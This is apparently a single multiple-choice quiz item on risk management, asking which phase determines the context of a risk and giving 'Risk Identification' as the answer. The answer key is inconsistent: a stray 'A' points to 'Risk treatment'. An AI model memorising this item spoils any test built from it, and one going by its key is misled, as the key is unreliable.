Which of the risk management phases is the context in which the risk exists determined?

Risk treatment
Risk assessment
Risk monitoring and review
Risk identification

A

Risk Identification